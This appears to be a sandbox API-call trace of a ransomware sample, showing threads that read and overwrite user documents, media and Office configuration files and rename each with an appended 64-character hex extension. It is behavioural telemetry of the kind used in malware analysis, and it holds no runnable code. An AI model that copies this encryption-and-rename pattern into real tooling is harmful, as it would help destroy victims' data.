[0124.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.297] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0124.297] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps", lpString2=".298DD12E65B20B3BFF3C4EC798C653B554A7314F1C63241CF9A049F1857E387A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps.298DD12E65B20B3BFF3C4EC798C653B554A7314F1C63241CF9A049F1857E387A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps.298DD12E65B20B3BFF3C4EC798C653B554A7314F1C63241CF9A049F1857E387A" [0124.297] GetProcessHeap () returned 0x600000 [0124.298] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14a) returned 0x6f27e8 [0124.298] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x26fff60, FileInformation=0x6f27e8, Length=0x14a, FileInformationClass=0xa) returned 0x0 [0124.300] CloseHandle (hObject=0x328) returned 1 [0124.301] GetProcessHeap () returned 0x600000 [0124.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.301] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.306] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0124.307] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls", lpString2=".07723A6FB5BAAC4964880B756B6DE36642B4C72EB87D760E693B740F74146056" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls.07723A6FB5BAAC4964880B756B6DE36642B4C72EB87D760E693B740F74146056") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls.07723A6FB5BAAC4964880B756B6DE36642B4C72EB87D760E693B740F74146056" [0124.307] GetProcessHeap () returned 0x600000 [0124.307] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x3151d20 [0124.307] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x26fff60, FileInformation=0x3151d20, Length=0x134, FileInformationClass=0xa) returned 0x0 [0124.308] CloseHandle (hObject=0x328) returned 1 [0124.308] GetProcessHeap () returned 0x600000 [0124.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.309] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.313] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0124.314] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc", lpString2=".B5B03B2F0D37118500E225392B5F0A315CE29BF7D19D3CE0E74C0AAD10442C06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc.B5B03B2F0D37118500E225392B5F0A315CE29BF7D19D3CE0E74C0AAD10442C06") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc.B5B03B2F0D37118500E225392B5F0A315CE29BF7D19D3CE0E74C0AAD10442C06" [0124.314] GetProcessHeap () returned 0x600000 [0124.314] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x31512e0 [0124.314] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x26fff60, FileInformation=0x31512e0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0124.315] CloseHandle (hObject=0x328) returned 1 [0124.315] GetProcessHeap () returned 0x600000 [0124.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.315] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.322] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0124.323] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps", lpString2=".310E7DDC85C8036BFB6A32BD4EBA750255D69690580E497FA2A07233CD7B995B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps.310E7DDC85C8036BFB6A32BD4EBA750255D69690580E497FA2A07233CD7B995B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps.310E7DDC85C8036BFB6A32BD4EBA750255D69690580E497FA2A07233CD7B995B" [0124.323] GetProcessHeap () returned 0x600000 [0124.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x118) returned 0x3368e40 [0124.323] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x3368e40, Length=0x118, FileInformationClass=0xa) returned 0x0 [0124.325] CloseHandle (hObject=0x32c) returned 1 [0124.326] GetProcessHeap () returned 0x600000 [0124.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.326] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.330] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.330] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.575] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.581] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.582] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x26fff70) returned 0x0 [0124.582] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a", lpString2=".FC457B08976042042BA570D4E61A5230810EDCBC8DCD6487E7DA95CAE4BEF717" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a.FC457B08976042042BA570D4E61A5230810EDCBC8DCD6487E7DA95CAE4BEF717") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\Gi2cuxKqz.m4a.FC457B08976042042BA570D4E61A5230810EDCBC8DCD6487E7DA95CAE4BEF717" [0124.582] GetProcessHeap () returned 0x600000 [0124.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x110) returned 0x311a0d0 [0124.583] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x311a0d0, Length=0x110, FileInformationClass=0xa) returned 0x0 [0124.593] CloseHandle (hObject=0x32c) returned 1 [0124.593] GetProcessHeap () returned 0x600000 [0124.593] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.593] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.949] ReadFile (in: hFile=0x328, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0124.950] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.950] WriteFile (in: hFile=0x328, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0124.953] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.956] ReadFile (in: hFile=0x328, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0124.956] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.980] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0124.980] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3", lpString2=".65A976BD9728AAABFC2EC9C00B64BDABAC5DB0AA3164A614CA4E4E9C80DDA442" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3.65A976BD9728AAABFC2EC9C00B64BDABAC5DB0AA3164A614CA4E4E9C80DDA442") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3.65A976BD9728AAABFC2EC9C00B64BDABAC5DB0AA3164A614CA4E4E9C80DDA442" [0124.980] GetProcessHeap () returned 0x600000 [0124.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15a) returned 0x336a468 [0124.980] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x26fff60, FileInformation=0x336a468, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0124.981] CloseHandle (hObject=0x334) returned 1 [0124.982] GetProcessHeap () returned 0x600000 [0124.982] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.983] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.983] WriteFile (in: hFile=0x32c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.984] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.517] ReadFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.517] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.524] WriteFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0125.528] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.531] ReadFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.531] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.538] WriteFile (in: hFile=0x338, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0125.541] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.556] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0125.562] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.564] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x26fff70) returned 0x0 [0125.564] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv", lpString2=".1B3D4BA9D1E458846674696F53BE7D7823E372AA4BB82046F370B8853C175E67" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv.1B3D4BA9D1E458846674696F53BE7D7823E372AA4BB82046F370B8853C175E67") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv.1B3D4BA9D1E458846674696F53BE7D7823E372AA4BB82046F370B8853C175E67" [0125.564] GetProcessHeap () returned 0x600000 [0125.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3119798 [0125.565] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x26fff60, FileInformation=0x3119798, Length=0x120, FileInformationClass=0xa) returned 0x0 [0125.566] CloseHandle (hObject=0x328) returned 1 [0125.567] GetProcessHeap () returned 0x600000 [0125.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0125.568] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0125.568] WriteFile (in: hFile=0x33c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0125.569] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff) Thread: id = 120 os_tid = 0xe6c [0091.020] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0104.940] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0104.941] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0104.943] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0104.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", lpString2=".23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B" [0104.943] GetProcessHeap () returned 0x600000 [0104.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x31635d0 [0104.955] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x27fff60, FileInformation=0x31635d0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0104.963] CloseHandle (hObject=0x30c) returned 1 [0104.965] GetProcessHeap () returned 0x600000 [0104.965] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0104.966] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0104.974] WriteFile (in: hFile=0x32c, lpBuffer=0x315b5b0, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b478 | out: lpBuffer=0x315b5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b478) returned 0x0 [0104.975] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.105] ReadFile (in: hFile=0x308, lpBuffer=0x3133458, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3113320 | out: lpBuffer=0x3133458*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3113320) returned 1 [0105.106] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.232] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.233] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.328] WriteFile (in: hFile=0x31c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.329] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.395] ReadFile (in: hFile=0x308, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.395] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.396] WriteFile (in: hFile=0x308, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0105.396] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.402] WriteFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 0x0 [0105.403] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.403] WriteFile (in: hFile=0x30c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0105.404] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.653] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.669] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.669] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0105.670] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.670] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0105.671] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", 